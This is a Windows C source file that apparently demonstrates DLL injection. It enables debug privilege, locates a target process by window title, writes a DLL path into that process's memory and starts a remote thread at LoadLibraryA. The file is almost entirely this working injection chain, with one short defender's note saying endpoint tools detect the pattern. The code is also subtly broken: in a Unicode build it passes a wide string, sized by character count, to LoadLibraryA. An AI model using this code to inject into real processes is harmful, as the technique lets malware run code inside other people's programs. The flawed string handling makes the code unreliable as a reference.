CreateRemoteThread

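#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <stdbool.h>

/*
 * CreateRemoteThread DLL-injection demonstration (Windows only).
 *
 * Flow: enable SE_DEBUG_NAME on the current token, find a window titled
 * "ok", open its owning process, copy a DLL path into that process and
 * start a remote thread at LoadLibraryA with the copied path as argument.
 *
 * Defender's note: the sequence in Start() - OpenProcess(PROCESS_ALL_ACCESS)
 * -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread pointing at
 * LoadLibraryA - is the textbook cross-process injection pattern that
 * endpoint detection tooling records and alerts on.
 */

bool Start(TCHAR* buff, DWORD pid);
BOOL EnablePrivilege(LPCTSTR lpszPrivilegeName, BOOL bEnable);

/*
 * Entry point: locate the target by window title and hand its pid to Start.
 * Returns 0 in every case, including when no window is found.
 */
int main(void)
{
    /* Best effort, as in the original: the result is not checked and the
     * program continues whether or not the privilege was enabled. */
    EnablePrivilege(SE_DEBUG_NAME, TRUE);

    /* Initialising the array from the literal is bounds-checked at compile
     * time and leaves the terminator in place; the original memcpy of 100
     * bytes read past the end of the much shorter literal. */
    TCHAR strbuff[100] = TEXT("D:\\个人资料\\桌面\\WKS\\dll.dll");

    HWND hwnd = FindWindow(NULL, TEXT("ok"));
    if (!hwnd) {
        printf("没有找到句柄\n");
        return 0;
    }

    DWORD pid = 0;
    /* The return value (owning thread id) was stored but never used. */
    GetWindowThreadProcessId(hwnd, &pid);

    Start(strbuff, pid);
    return 0;
}

/*
 * Copy the path in `buff` into process `pid` and run LoadLibraryA on it in a
 * new remote thread. Always returns true, even when any step fails, so the
 * caller cannot tell whether injection happened (unchanged from original).
 * The remote allocation is never freed; the remote thread is not waited on.
 */
bool Start(TCHAR* buff, DWORD pid)
{
    /* PROCESS_ALL_ACCESS requests every right on the target; this handle
     * open is the first step of the chain detection tooling records. */
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (hProcess) {
        int len = _tcslen(buff);
        /* Reserve writable memory in the target for the DLL path. */
        LPVOID pAddr = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT, PAGE_READWRITE);
        if (pAddr) {
            /* Copy the path across; the bytes-written out-param is not
             * checked, as in the original. */
            if (WriteProcessMemory(hProcess, pAddr, buff, len, NULL)) {
                /* Address of LoadLibraryA as seen from this process, used as
                 * the remote thread's start routine. */
                PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
                    GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
                if (pfnStartAddr) {
                    DWORD threadId = 0;
                    /* dwStackSize 0 = default; original passed NULL for it. */
                    HANDLE rThread = CreateRemoteThread(hProcess, NULL, 0, pfnStartAddr,
                                                        pAddr, 0, &threadId);
                    if (rThread) {
                        printf("远程线程执行成功!");
                        /* Only close a handle that was actually created; the
                         * original called CloseHandle(NULL) on failure. */
                        CloseHandle(rThread);
                    }
                }
            }
        }
        CloseHandle(hProcess);
    }
    return true;
}

/*
 * Enable or disable one named privilege on the current process token.
 *
 * lpszPrivilegeName: privilege constant such as SE_DEBUG_NAME.
 * bEnable:           TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear it.
 * Returns TRUE only when the token was opened, the name resolved, and
 * AdjustTokenPrivileges reported ERROR_SUCCESS (i.e. the privilege is
 * actually held). The token handle is closed on every path.
 */
BOOL EnablePrivilege(LPCTSTR lpszPrivilegeName, BOOL bEnable)
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_READ, &hToken))
        return FALSE;

    BOOL result = FALSE;
    LUID luid;
    /* The original returned TRUE here and leaked hToken; an unresolvable
     * privilege name is a failure. */
    if (LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid)) {
        TOKEN_PRIVILEGES tp = {0};
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luid;
        tp.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

        /* AdjustTokenPrivileges returns TRUE even when the privilege is not
         * held (last error ERROR_NOT_ALL_ASSIGNED), so the last-error value
         * must be read immediately - before CloseHandle can overwrite it,
         * which is where the original read it. */
        BOOL adjusted = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
        DWORD err = GetLastError();
        result = adjusted && err == ERROR_SUCCESS;
    }
    CloseHandle(hToken);
    return result;
}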
